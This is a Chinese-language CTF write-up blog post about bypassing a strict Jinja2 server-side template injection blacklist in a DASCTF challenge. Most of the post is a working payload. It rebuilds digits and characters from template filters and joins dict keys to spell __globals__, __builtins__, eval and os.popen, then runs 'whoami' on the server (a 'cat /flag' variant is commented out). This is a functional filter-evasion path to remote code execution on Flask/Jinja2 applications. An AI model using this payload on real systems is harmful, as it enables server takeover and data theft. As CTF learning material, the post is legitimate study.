Toc
0 results found
Rayi
SSTI花活

dasctf做题遇到了一个阴间过滤,于是写了个阴间payload

过滤如下:

blacklist</br>   
'.','[','\'','"',''\\','+',':','_',</br>   
'chr','pop','class','base','mro','init','globals','get',</br>   
'eval','exec','os','popen','open','read',</br>   
'select','url_for','get_flashed_messages','config','request',</br>   
'count','length','0','1','2','3','4','5','6','7','8','9','0','1','2','3','4','5','6','7','8','9'</br>

理论上有更简单的方法,但是我当时并不是很清楚。。

# payload分析
# 因为ban掉了数字,所以要获取数字
{% set zero=(self|int) %}
{% set one=(zero**zero)|int %}
# ban掉了加号
{%set two=(zero-one-one)|abs %}
{%set two=(zero-one-one)|abs %}
# 获取字符的一种方式
{%set c=dict(c=one)|reverse|first %}
# 获取百分号
{% set bfh=self|urlencode|first %}
# 获取%c
{% set bfhc=bfh~c %}
# 获取必要的数字
{% set five=(two*two*two)-one-one-one %}
{% set nine=(two*two*two*two-five-one-one) %}
{% set three=five-one-one %}
{% set four=five-one %}
{% set seven=nine-one-one %}
# 通过%c和ascii码获取任意字符
{% set xhx=bfhc%((nine~five)|int)%}
# 获取字符的另一种方式
# 获取init,global等关键字
{% set ini = dict(ini=aa,t=bb)|join() %}
{% set glo = dict(glo=aa,bals=bb)|join() %}
{% set ite = dict(ite=aa,ms=bb)|join() %}
{% set spa = (self|string|min)%}
{% set pt = (self|float|string|min)%}
{% set bu = dict(buil=aa,tins=dd)|join() %}
{% set im = dict(imp=aa,ort=dd)|join() %}
{% set sy = dict(po=aa,pen=bb)|join() %}
{% set ocmd = dict(o=aa,s=bb)|join() %}
{% set ev = dict(ev=aa,al=dd)|join() %}
{% set red = dict(re=aa,ad=dd)|join()%}
# cat /flag
{% set ca = dict(ca=aa,t=dd)|join() %}
{% set flg = dict(fla=aa,g=dd)|join() %}
# 获取引号,小括号,斜杠
{% set yin=bfhc%((three~nine)|int)%}
{% set left = bfhc%((four~zero)|int)%} 
{% set right = bfhc%((four~one)|int)%}
{% set slas = bfhc%((four~seven)|int)%}
{% set flg = dict(fla=aa,g=dd)|join() %}
# 组合命令
# {% set rce = ca~slas~flg %}
{% set rce = dict(who=aa,ami=dd)|join() %}
{% set bul = xhx~xhx~bu~xhx~xhx %}
{% set pld = xhx~xhx~im~xhx~xhx~left~yin~ocmd~yin~right~pt~sy~left~yin~rce~yin~right~pt~red~left~right %}
# 遍历查找可用函数,通过attr和()获取
{% for f,v in (self|attr(xhx~xhx~ini~xhx~xhx)|attr(xhx~xhx~glo~xhx~xhx)|attr(ite))() %}{% if f == bul %}{% for a,b in (v|attr(ite))() %}{% if a == ev %}{{b(pld)}}{% endif %}{% endfor %}{% endif %}{% endfor %}

image-20210329211228186

本文作者:Rayi
版权声明:本文首发于Rayi的博客,转载请注明出处!